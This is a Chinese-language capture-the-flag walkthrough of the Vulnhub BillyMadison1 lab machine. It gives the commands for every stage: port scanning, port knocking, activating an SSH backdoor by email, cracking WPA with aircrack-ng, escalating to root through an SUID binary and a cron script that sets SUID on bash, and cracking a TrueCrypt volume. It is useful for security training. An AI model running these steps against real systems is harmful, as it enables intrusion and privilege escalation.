[Vulnhub] BillyMadison1dot Wireshark+Port-Knocking+SMTP+Aircrack-ng+donpcgd+veracrypt
字数 1989 2025-08-19 12:41:24
BillyMadison1靶机渗透测试详细教学文档
1. 信息收集阶段
1.1 初始扫描
使用Nmap进行全端口扫描:
nmap -p- 192.168.8.101 --min-rate 1000 -sC -sV
扫描结果:
- 开放端口:
- 22/tcp: SSH (tcpwrapped)
- 23/tcp: Telnet (tcpwrapped)
- 69/tcp: TFTP/CalDAV (Radicale calendar and contacts server)
- 80/tcp: HTTP (Apache 2.4.18)
- 137/tcp: NetBIOS (closed)
- 138/tcp: NetBIOS (closed)
- 139/tcp: NetBIOS (Samba smbd 3.X-4.X)
- 445/tcp: SMB (Samba smbd 4.3.11-Ubuntu)
- 2525/tcp: SMTP (SubEthaSMTP)
1.2 Telnet服务检查
通过Telnet连接23端口发现提示信息:
- 暗示Billy正在破解WiFi
- 提供密文:
rkfpuzrahngvat - 提示不使用ROTten加密(实际使用ROT13)
解密密文:
echo "rkfpuzrahngvat" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
解密结果:exschmenuating
2. Web应用分析
2.1 目录发现
访问发现的目录:
http://192.168.8.101/exschmenuating/
发现日记内容:
- 提到"veronica"可能用于密码
- 暗示存在.cap文件(Wireshark捕获文件)
- 文件名可能包含"veronica"
2.2 文件枚举
生成veronica相关字典:
grep -i veronica /usr/share/wordlists/rockyou.txt > veronica.txt
使用gobuster搜索.cap文件:
gobuster dir -u "http://192.168.8.101/exschmenuating/" -w veronica.txt -x cap
发现文件:
http://192.168.8.101/exschmenuating/012987veronica.cap
3. 邮件分析
通过SMTP服务(2525端口)分析邮件通信:
-
第一封邮件:
- 主题:VIRUS ALERT!
- 内容:Eric通知Veronica安装新的防病毒程序
- 包含恶意链接:
http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php
-
第二封邮件:
- Veronica回复无法下载,请求通过FTP上传
- 提到"Spanish Armada"组合(端口敲门提示)
- 提供视频链接:
https://www.油官.com/watch?v=z5YU7JwVy7s
-
第三封邮件:
- Eric提供FTP凭据:
- 用户名:
eric - 密码:
ericdoesntdrinkhisownpee
- 用户名:
- Eric提供FTP凭据:
-
第四封邮件:
- Veronica确认账户设置完成
-
第五封邮件:
- Eric通知文件已上传到FTP服务器
-
第六封邮件:
- Veronica描述电脑异常行为
4. 端口敲门技术
根据邮件提示,使用端口敲门开启FTP服务:
knock 192.168.8.101 1466 67 1469 1514 1981 1986 -d 200
注意:如果未响应,可能需要重启靶机
5. FTP服务利用
使用获得的凭据登录FTP:
ftp eric@192.168.8.101
密码:ericdoesntdrinkhisownpee
获取隐藏文件:
get .notes
文件内容:
- 提到SSH后门
- 需要发送特定内容的邮件来激活后门:
- 内容需包含:"My kid will be a"
6. 激活SSH后门
发送激活邮件:
swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.8.101:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be soccer player"
再次扫描端口确认SSH后门开放:
nmap -p- 192.168.8.101 -Pn --min-rate 1000 -sV
7. 破解无线网络
从FTP下载无线捕获文件:
get eg-01.cap
使用aircrack-ng破解WiFi密码:
aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt
获得密码:triscuit*
8. SSH登录
使用后门端口登录Eric账户:
ssh eric@192.168.8.101 -p 1974
获取local.txt内容:suw82jjapj
9. 权限提升
9.1 查找SUID文件
find / -perm -4000 -type f 2>/dev/null
发现可疑文件:/usr/local/share/sgml/donpcgd
9.2 利用donpcgd提权
- 创建临时文件:
touch /tmp/h4ck
- 利用donpcgd复制文件:
/usr/local/share/sgml/donpcgd /tmp/h4ck /etc/cron.hourly/h4ck
- 创建提权脚本:
echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /etc/cron.hourly/h4ck
chmod +x /etc/cron.hourly/h4ck
- 等待cron执行后获取root shell:
bash -p
获取proof.txt内容:dh2i1poad
10. 加密文件破解
10.1 发现加密文件
cd /PRIVATE/
cat hint.txt
提示链接:https://en.维姬百科.org/wiki/Billy_Madison
10.2 生成字典
cewl --depth 0 https://en.维姬百科.org/wiki/Billy_Madison > ./billy.txt
10.3 破解加密文件
truecrack -v -t BowelMovement -w billy.txt
获得密码:execrable
10.4 挂载加密卷
sudo cryptsetup --type tcrypt open BowelMovement h4ck13
sudo mkdir /mnt/h4ck13
sudo mount /dev/mapper/h4ck13 /mnt/h4ck13
cp /mnt/h4ck13/secret.zip ./
unzip secret.zip
11. Firefox端口限制绕过
如需访问非标准端口(如69端口),修改Firefox配置:
- 地址栏输入:
about:config - 搜索或创建:
network.security.ports.banned.override - 添加允许的端口号,如:
69(多个端口用逗号分隔) - 重启Firefox生效
关键知识点总结
- 信息收集:全面的端口扫描和目录枚举
- 密码学:ROT13加密识别与解密
- 社会工程学:从邮件通信中提取关键信息
- 端口敲门:特定端口序列触发服务开放
- 无线安全:Wireshark捕获文件分析与破解
- 后门利用:通过特定条件激活隐藏服务
- 权限提升:SUID文件滥用和cron任务利用
- 加密破解:字典生成与加密卷破解
- 配置绕过:浏览器安全限制调整
通过以上步骤,完整地完成了从信息收集到最终获取root权限并破解加密文件的渗透测试过程。